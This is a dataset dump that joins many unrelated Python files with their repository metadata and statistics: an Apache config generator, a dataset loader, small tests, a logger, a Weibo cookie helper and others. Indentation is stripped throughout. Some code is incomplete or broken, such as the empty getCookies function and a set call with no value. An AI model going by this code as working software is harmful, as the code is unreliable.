match_test = re.compile(r'.*[\[(^$].*')
for _ in proxies:
if match_test.match(_.split(' ')[0]):
proxies_match.append(_)
else:
proxies_pass.append(_)
return [proxies_pass, proxies_match]
def dump_config(self):
virtualhost_tpl = Template(open(self.config.wt_path + '/templates/apache/virtualhost.conf.jinja').read(),
trim_blocks=True, lstrip_blocks=True)
virtualhost_302_tpl = Template(
open(self.config.wt_path + '/templates/apache/virtualhost-302.conf.jinja').read(), trim_blocks=True,
lstrip_blocks=True)
sites = self.config.get_config('sites')
os.system(f'rm -rf {self.config.wt_config_path}/sites/*')
for site in sites:
site_config = sites.get(site)
if site_config is None:
continue
path = site_config.get('path')
public_path = site_config.get('public_path')
custom = site_config.get('custom')
aliases = site_config.get('alias')
proxies = site_config.get('proxy')
secure = site_config.get('secure')
crt_path = f'{self.config.certificate_path}/{site}.crt'
key_path = f'{self.config.certificate_path}/{site}.key'
php_version = self.config.get_site_config('php/version', site)
log_path = f'{self.config.wt_config_path}/log'
if path is not None and not os.path.exists(path):
continue
server_name = f"{site}.test"
if aliases is not None:
aliases = ' '.join(aliases)
proxies_pass, proxies_match = self.filter_proxies(proxies)
public_html = str(path).rstrip('/')
if public_path is not None:
public_html += '/' + public_path
virtualhost_tpl.stream(path='/var/www/html').dump(f'{self.config.wt_config_path}/sites/000-default.conf')
virtualhost_tpl.stream(
secure=True,
path='/var/www/html',
crt_path='/etc/ssl/certs/ssl-cert-snakeoil.pem',
key_path='/etc/ssl/private/ssl-cert-snakeoil.key'
).dump(f'{self.config.wt_config_path}/sites/000-default-ssl.conf')
if secure and os.path.exists(crt_path) and os.path.exists(key_path):
virtualhost_302_tpl.stream(
server_name=server_name,
aliases=aliases).dump(f'{self.config.wt_config_path}/sites/{site}.conf')
virtualhost_tpl.stream(
site_id=site,
log_path=log_path,
path=public_html,
server_name=server_name,
proxies_pass=proxies_pass,
proxies_match=proxies_match,
secure=secure,
crt_path=crt_path,
key_path=key_path,
custom=custom,
aliases=aliases,
php_version=php_version).dump(f'{self.config.wt_config_path}/sites/{site}-ssl.conf')
else:
virtualhost_tpl.stream(
site_id=site,
path=public_html,
log_path=log_path,
server_name=server_name,
proxies_pass=proxies_pass,
proxies_match=proxies_match,
custom=custom,
aliases=aliases,
php_version=php_version).dump(f'{self.config.wt_config_path}/sites/{site}.conf')
| 38.649007 | 117 | 0.576251 | 727 | 5,836 | 4.45392 | 0.191197 | 0.061767 | 0.048178 | 0.048178 | 0.492897 | 0.413218 | 0.344348 | 0.286288 | 0.273935 | 0.247375 | 0 | 0.014778 | 0.304318 | 5,836 | 150 | 118 | 38.906667 | 0.782759 | 0.008568 | 0 | 0.205128 | 0 | 0.042735 | 0.293273 | 0.154245 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08547 | false | 0.051282 | 0.025641 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1529448fe3457ec4ff872b8296c0cfa1eb4b79fd | 1,696 | py | Python | observations/r/edc_t.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | observations/r/edc_t.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | observations/r/edc_t.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def edc_t(path):
"""EPICA Dome C Ice Core 800KYr Temperature Estimates
Temperature record, using Deuterium as a proxy, from the EPICA (European
Project for Ice Coring in Antarctica) Dome C ice core covering 0 to 800
kyr BP.
A data frame with 5788 observations on the following 5 variables.
`Bag`
Bag number
`ztop`
Top depth (m)
`Age`
Years before 1950
`Deuterium`
Deuterium dD data
`dT`
Temperature difference from the average of the last 1000 years ~
-54.5degC
http://www.ncdc.noaa.gov/paleo/icecore/antarctica/domec/domec_epica_data.html
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `edc_t.csv`.
Returns:
Tuple of np.ndarray `x_train` with 5788 rows and 5 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'edc_t.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/DAAG/edcT.csv'
maybe_download_and_extract(path, url,
save_file_name='edc_t.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
| 25.313433 | 77 | 0.683962 | 244 | 1,696 | 4.614754 | 0.581967 | 0.01421 | 0.042629 | 0.040853 | 0.039076 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023202 | 0.237618 | 1,696 | 66 | 78 | 25.69697 | 0.847641 | 0.540684 | 0 | 0 | 0 | 0 | 0.086675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.409091 | 0 | 0.5 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
152baac0bcb386cd9039bbdf5a3fc9368ffcc277 | 449 | py | Python | packages/w3af/w3af/core/controllers/tests/pylint_plugins/scapy_fix.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/core/controllers/tests/pylint_plugins/scapy_fix.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/core/controllers/tests/pylint_plugins/scapy_fix.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | from astroid import MANAGER, register_module_extender
from astroid.builder import AstroidBuilder
CODE_FIX = """
class IP(object): pass
class TCP(object): pass
class UDP(object): pass
class traceroute(object):
def __init__(domain, dport=80, maxttl=1):
pass
"""
def scapy_transform():
return AstroidBuilder(MANAGER).string_build(CODE_FIX)
def register(linter):
register_module_extender(MANAGER, 'scapy.all', scapy_transform)
| 21.380952 | 67 | 0.755011 | 58 | 449 | 5.62069 | 0.551724 | 0.092025 | 0.138037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007792 | 0.142539 | 449 | 20 | 68 | 22.45 | 0.838961 | 0 | 0 | 0 | 0 | 0 | 0.36971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.285714 | 0.142857 | 0.071429 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1531dbe5c427016a8df4fde2687fdccee363670d | 428 | py | Python | exercises/es/test_01_02_02.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 2,085 | 2019-04-17T13:10:40.000Z | 2022-03-30T21:51:46.000Z | exercises/es/test_01_02_02.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 79 | 2019-04-18T14:42:55.000Z | 2022-03-07T08:15:43.000Z | exercises/es/test_01_02_02.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 361 | 2019-04-17T13:34:32.000Z | 2022-03-28T04:42:45.000Z | def test():
import spacy.tokens
import spacy.lang.de
assert isinstance(
nlp, spacy.lang.de.German
), "El objeto nlp debería ser un instance de la clase de alemán."
assert isinstance(
doc, spacy.tokens.Doc
), "¿Procesaste el texto con el objeto nlp para crear un doc?"
assert "print(doc.text)" in __solution__, "¿Imprimiste en pantalla el doc.text?"
__msg__.good("Sehr gut! :)")
| 30.571429 | 84 | 0.658879 | 63 | 428 | 4.380952 | 0.603175 | 0.07971 | 0.07971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235981 | 428 | 13 | 85 | 32.923077 | 0.83792 | 0 | 0 | 0.181818 | 0 | 0 | 0.420561 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 1 | 0.090909 | true | 0 | 0.181818 | 0 | 0.272727 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
153b36c3ab1564adaec52e59c3f3bdda7d0a41bf | 1,091 | py | Python | resources/libraries/python/TLDK/TLDKConstants.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | resources/libraries/python/TLDK/TLDKConstants.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | resources/libraries/python/TLDK/TLDKConstants.py | preym17/csit | 3151c98618c78e3782e48bbe4d9c8f906c126f69 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2017 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file defines the constants variables for the TLDK test."""
class TLDKConstants(object):
"""Define the directory path for the TLDK test."""
# TLDK testing directory location at topology nodes
REMOTE_FW_DIR = '/tmp/TLDK-testing'
# Shell scripts location
TLDK_SCRIPTS = 'tests/tldk/tldk_scripts'
# Libraries location
TLDK_DEPLIBS = 'tests/tldk/tldk_deplibs'
# Config files location for the TLDK test
TLDK_TESTCONFIG = 'tests/tldk/tldk_testconfig'
| 34.09375 | 74 | 0.740605 | 158 | 1,091 | 5.063291 | 0.582278 | 0.075 | 0.0375 | 0.0525 | 0.045 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008979 | 0.183318 | 1,091 | 31 | 75 | 35.193548 | 0.888889 | 0.741522 | 0 | 0 | 0 | 0 | 0.347656 | 0.28125 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
153d87e711b2229f4d6b50d986f38e678169f1ca | 2,423 | py | Python | comsyl/utils/Logger.py | s-sajid-ali/comsyl | f2a5d984b1e870d203a9152bbeca804c4304850e | [
"MIT"
] | 2 | 2020-07-22T06:50:55.000Z | 2021-01-10T05:26:59.000Z | comsyl/utils/Logger.py | s-sajid-ali/comsyl | f2a5d984b1e870d203a9152bbeca804c4304850e | [
"MIT"
] | 1 | 2017-07-06T09:55:30.000Z | 2017-07-06T09:55:30.000Z | comsyl/utils/Logger.py | s-sajid-ali/comsyl | f2a5d984b1e870d203a9152bbeca804c4304850e | [
"MIT"
] | 4 | 2019-12-09T18:27:36.000Z | 2021-01-10T05:27:03.000Z | # coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2017 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
__authors__ = ["M Glass - ESRF ISDD Advanced Analysis and Modelling"]
__license__ = "MIT"
__date__ = "20/04/2017"
import time
from comsyl.parallel.utils import isMaster
import sys
class Logger(object):
def __init__(self):
self.resetLog()
def resetLog(self):
self._total_log = []
def log(self, log_string):
if isMaster():
self.logAll(log_string)
def logAll(self, log_string):
output = "[%s] %s" %(time.strftime("%Y-%m-%d %H:%M:%S"), log_string)
print(output)
self._total_log.append(output)
sys.stdout.flush()
def totalLog(self):
return "\n".join(self._total_log)
logger = Logger()
def log(log_string):
logger.log(log_string)
def logAll(log_string):
logger.logAll(log_string)
def getTotalLog():
return logger.totalLog()
def resetLog():
logger.resetLog()
def logProgress(n_max, n_current, process):
try:
if n_current%(int(n_max*0.02)) == 0:
log("%s: %i / %i " % (process, n_current+1, n_max))
except ZeroDivisionError:
log("%s: %i" % (process, n_current+1))
| 30.2875 | 79 | 0.651671 | 323 | 2,423 | 4.773994 | 0.489164 | 0.057069 | 0.023346 | 0.023346 | 0.022049 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009714 | 0.192736 | 2,423 | 79 | 80 | 30.670886 | 0.77863 | 0.45357 | 0 | 0 | 0 | 0 | 0.093913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0 | 0.083333 | 0.055556 | 0.444444 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
15557b0acfa632452741f9b804e97b7b1326c532 | 497 | py | Python | python/iterables-and-iterators/sol.py | natebwangsut/hackerrank | 548daf5d8e976031f839fba384755536a4d92869 | [
"MIT"
] | null | null | null | python/iterables-and-iterators/sol.py | natebwangsut/hackerrank | 548daf5d8e976031f839fba384755536a4d92869 | [
"MIT"
] | null | null | null | python/iterables-and-iterators/sol.py | natebwangsut/hackerrank | 548daf5d8e976031f839fba384755536a4d92869 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Hackerrank Solution
-
Nate B. Wangsutthitham
<@natebwangsut | nate.bwangsut@gmail.com>
"""
__author__ = "Nate B. Wangsutthitham"
__credits__ = ["Nate B. Wangsutthitham"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "Nate B. Wangsutthitham"
__email__ = "nate.bwangsut@gmail.com"
import itertools
line = input()
line = input().split()
repeat = int(input())
com = list(itertools.combinations(line, repeat))
print(sum(("a" in x) for x in com) / len(com))
| 19.115385 | 48 | 0.704225 | 64 | 497 | 5.09375 | 0.59375 | 0.06135 | 0.233129 | 0.122699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006977 | 0.134809 | 497 | 25 | 49 | 19.88 | 0.751163 | 0.215292 | 0 | 0 | 0 | 0 | 0.256545 | 0.060209 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1558f878e6d53f74f8dea1a8a029e87ceea27170 | 774 | py | Python | app/exception.py | hggffhhfg/project_clever | fe0f954765c8570f504b6b92430333eef0658fc9 | [
"MIT"
] | null | null | null | app/exception.py | hggffhhfg/project_clever | fe0f954765c8570f504b6b92430333eef0658fc9 | [
"MIT"
] | null | null | null | app/exception.py | hggffhhfg/project_clever | fe0f954765c8570f504b6b92430333eef0658fc9 | [
"MIT"
] | null | null | null | class TimeInBedLessSleepError(Exception):
"""Ошибка возникающая, если время проведенное в кровати меньше времени сна"""
pass
class NonUniqueNotationDate(Exception):
"""Ошибка возникающая, если при импортировании файла с записями находится запись с датой,
которая уже существует в дневнике сна/базе данных"""
pass
Errors = {
'add': 'При добавлении записи в дневник произошла ошибка',
'update': 'При обновлении записи в дневнике произошла ошибка',
'value': 'Неподходящее значение',
'syntax': 'Неподходящий формат',
'type': 'Неподходящий тип данных',
'database': 'При обращении к базе данных произошла ошибка',
'file': 'Файл не был найден',
'import': 'При импортировании произошла ошибка',
'other': 'Прочая ошибка'
}
| 33.652174 | 93 | 0.710594 | 86 | 774 | 6.395349 | 0.651163 | 0.109091 | 0.094545 | 0.109091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18863 | 774 | 22 | 94 | 35.181818 | 0.875796 | 0.268734 | 0 | 0.133333 | 0 | 0 | 0.575318 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.133333 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
155c943d731c9fffb4028721fc8f1209e9ca0e8b | 354 | py | Python | Operation/Sub.py | janvi16/-HACKTOBERFEST2K20 | aa9c8b6f7feb245793c0a003ba6fbea3fca9ca22 | [
"Apache-2.0"
] | null | null | null | Operation/Sub.py | janvi16/-HACKTOBERFEST2K20 | aa9c8b6f7feb245793c0a003ba6fbea3fca9ca22 | [
"Apache-2.0"
] | null | null | null | Operation/Sub.py | janvi16/-HACKTOBERFEST2K20 | aa9c8b6f7feb245793c0a003ba6fbea3fca9ca22 | [
"Apache-2.0"
] | null | null | null | #python program to subtract two numbers using function
def subtraction(x,y): #function definifion for subtraction
sub=x-y
return sub
num1=int(input("please enter first number: "))#input from user to num1
num2=int(input("please enter second number: "))#input from user to num2
print("Subtraction is: ",subtraction(num1,num2))#call the function
| 35.4 | 71 | 0.754237 | 54 | 354 | 4.944444 | 0.574074 | 0.014981 | 0.104869 | 0.142322 | 0.157303 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.144068 | 354 | 9 | 72 | 39.333333 | 0.861386 | 0.426554 | 0 | 0 | 0 | 0 | 0.358586 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
155db2774fcc01b3f5cf921b0001ee17ef81286e | 681 | py | Python | workplanner/fields.py | pavelmaksimov/work-planner | e6659e7e00520d32b8bc622909990ba3522046da | [
"Apache-2.0"
] | null | null | null | workplanner/fields.py | pavelmaksimov/work-planner | e6659e7e00520d32b8bc622909990ba3522046da | [
"Apache-2.0"
] | null | null | null | workplanner/fields.py | pavelmaksimov/work-planner | e6659e7e00520d32b8bc622909990ba3522046da | [
"Apache-2.0"
] | null | null | null | from typing import Optional
import peewee
import pendulum
from workplanner.utils import normalize_datetime, strftime_utc
class DateTimeUTCField(peewee.DateTimeField):
def python_value(self, value: str) -> Optional[pendulum.DateTime]:
if value is not None:
return pendulum.parse(value, tz=pendulum.timezone("UTC"))
return None
def db_value(self, value: Optional[pendulum.DateTime]) -> Optional[str]:
if value is not None:
value = normalize_datetime(value)
if value.tzinfo is None:
raise ValueError(f"{value} timezone not set.")
value = strftime_utc(value)
return value
| 26.192308 | 76 | 0.666667 | 81 | 681 | 5.530864 | 0.419753 | 0.046875 | 0.0625 | 0.053571 | 0.071429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25257 | 681 | 25 | 77 | 27.24 | 0.880157 | 0 | 0 | 0.125 | 0 | 0 | 0.041116 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
155f5d6fdc9986ef1c6d5d459061790335cd6046 | 993 | py | Python | wagtail_to_ion/templatetags/content_type_description.py | anfema/wagtail_to_ion | 2c042d220f4421f8a277c4bfcbdd65f89d76f4c7 | [
"MIT"
] | 1 | 2022-02-22T08:13:16.000Z | 2022-02-22T08:13:16.000Z | wagtail_to_ion/templatetags/content_type_description.py | anfema/wagtail_to_ion | 2c042d220f4421f8a277c4bfcbdd65f89d76f4c7 | [
"MIT"
] | 33 | 2020-11-05T10:30:27.000Z | 2022-03-11T12:23:25.000Z | wagtail_to_ion/templatetags/content_type_description.py | anfema/wagtail_to_ion | 2c042d220f4421f8a277c4bfcbdd65f89d76f4c7 | [
"MIT"
] | null | null | null | from collections import namedtuple
from django import template
from wagtail_to_ion.models import get_ion_content_type_description_model
register = template.Library()
@register.simple_tag
def content_type_description(app_label, model_name, verbose_name):
ContentTypeDescription = get_ion_content_type_description_model()
content_type_description = namedtuple("content_type_description", ["description", "image_url"])
image_path = None
try:
description_object = ContentTypeDescription.objects.get(content_type__app_label=app_label, content_type__model=model_name)
except ContentTypeDescription.DoesNotExist:
description_object = None
if description_object:
if description_object.example_image:
image_path = description_object.example_image.url
return content_type_description(description_object.description, image_path)
else:
return content_type_description('Page of type "{}"'.format(verbose_name), None)
| 34.241379 | 130 | 0.787513 | 115 | 993 | 6.382609 | 0.356522 | 0.134877 | 0.209809 | 0.046322 | 0.089918 | 0.089918 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148036 | 993 | 28 | 131 | 35.464286 | 0.867612 | 0 | 0 | 0 | 0 | 0 | 0.06143 | 0.024169 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1561aa03dbe771d5034e94f0d6d20984e6bcc7cc | 480 | py | Python | src/ukw_intelli_store/__init__.py | Maddonix/ukw-intelli-store | a6ba088e70d5ee2e9499a9c72477833dfccafb0b | [
"MIT"
] | null | null | null | src/ukw_intelli_store/__init__.py | Maddonix/ukw-intelli-store | a6ba088e70d5ee2e9499a9c72477833dfccafb0b | [
"MIT"
] | null | null | null | src/ukw_intelli_store/__init__.py | Maddonix/ukw-intelli-store | a6ba088e70d5ee2e9499a9c72477833dfccafb0b | [
"MIT"
] | null | null | null | '''
Package to read and process material export data.
To use, initiate an endomaterial object and start exploring!
---------
Examples:
## Init
from ukw_intelli_store import EndoMaterial
em = EndoMaterial(path, path)
## To explore all used materials:
em.mat_info
## To explore specific material id
em.get_mat_info_for_id(material_id)
## To get all logged dgvs keys:
em.get_dgvs_keys()
## To explore a single dgvs key:
em.get_dgvs_key_summary()
'''
__version__ = '0.0.0'
| 16 | 60 | 0.7375 | 75 | 480 | 4.493333 | 0.573333 | 0.080119 | 0.053412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007407 | 0.15625 | 480 | 29 | 61 | 16.551724 | 0.824691 | 0.93125 | 0 | 0 | 0 | 0 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
156605f988cf64194142750c94c848f0887cf602 | 1,199 | py | Python | weibospider/WeiboCookies.py | cirlmcesc/weibo-userdata-crawler | e6bb2740a31701a7c2bda931f6714f105951328d | [
"MIT"
] | 3 | 2018-01-16T07:33:50.000Z | 2018-01-21T05:30:43.000Z | weibospider/WeiboCookies.py | cirlmcesc/weibo-userdata-spider | e6bb2740a31701a7c2bda931f6714f105951328d | [
"MIT"
] | null | null | null | weibospider/WeiboCookies.py | cirlmcesc/weibo-userdata-spider | e6bb2740a31701a7c2bda931f6714f105951328d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" weibo login """
import json
import os
import logging
import requests
from weibospider.WeiboAccounts import accounts
logger = logging.getLogger(__name__)
def getCookies(username, password):
""" 单个账号登录 """
def getAllAccountsCookies(rconn):
""" 将所有账号登录后把cookies存入reids """
for account in accounts:
key, username, password = "Spider:Cookies:%s--%s" % (account[0], account[1]), account[0], account[1]
if rconn.get(key) is None:
rconn.set(key), getCookies(username, password)
if "".join(rconn.keys()).count("Spider:Cookies") == 0:
logger.warning('None cookies, Stopping...')
os.system("pause")
def resetCookies(rconn, accounttext):
""" 重新获取cookies """
username = accounttext.split("--")[0]
password = accounttext.split("--")[1]
rconn.set("Spider:Cookies:%s" % accounttext, getCookies(username, password))
logger.warning("The cookie of %s has been updated successfully !" % accounttext)
def removeCookies(rconn, accounttext):
""" 删除cookies """
rconn.delete("Spider:Cookies:%s" % accounttext)
logger.warning("The cookie of %s has been deleted successfully !" % accounttext)
| 27.883721 | 108 | 0.664721 | 133 | 1,199 | 5.962406 | 0.458647 | 0.080706 | 0.098361 | 0.040353 | 0.080706 | 0.080706 | 0.080706 | 0.080706 | 0 | 0 | 0 | 0.008147 | 0.180984 | 1,199 | 42 | 109 | 28.547619 | 0.799389 | 0.076731 | 0 | 0 | 0 | 0 | 0.184944 | 0.019517 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0.217391 | 0.217391 | 0 | 0.391304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
156f7d77d17c563b95530ec46f7751f349e4e705 | 1,315 | py | Python | website/tests/test_practical_info.py | laudrup/ebbamaala | 1e6bb3dc625e1613e23cbfd69b9cb4336ab9ef13 | [
"MIT"
] | null | null | null | website/tests/test_practical_info.py | laudrup/ebbamaala | 1e6bb3dc625e1613e23cbfd69b9cb4336ab9ef13 | [
"MIT"
] | 8 | 2020-05-22T11:48:52.000Z | 2021-11-06T15:34:23.000Z | website/tests/test_practical_info.py | laudrup/ebbamaala | 1e6bb3dc625e1613e23cbfd69b9cb4336ab9ef13 | [
"MIT"
] | 1 | 2021-08-03T22:42:18.000Z | 2021-08-03T22:42:18.000Z | from unittest import mock
from urllib.parse import urlencode
from django.conf import settings
from django.contrib.auth import get_user_model
from django.test import TestCase
from website.models import PracticalInfo
class PracticalInfoViewTests(TestCase):
def setUp(self):
User = get_user_model()
self.user = User.objects.create_user('bobby', 'littlebobby@gmail.com', 'tables')
def test_not_logged_in(self):
response = self.client.get('/info')
url = "{}?{}".format(settings.LOGIN_URL, urlencode({'next': '/info'}))
self.assertRedirects(response, url)
@mock.patch('website.views.logger')
def test_no_info(self, mock_logger):
self.client.login(username='bobby', password='tables')
response = self.client.get('/info')
self.assertEqual(404, response.status_code)
mock_logger.warning.assert_called_with('No practical info added')
def test_practical_info_added(self):
practical_info_content = b'The moose is on the loose'
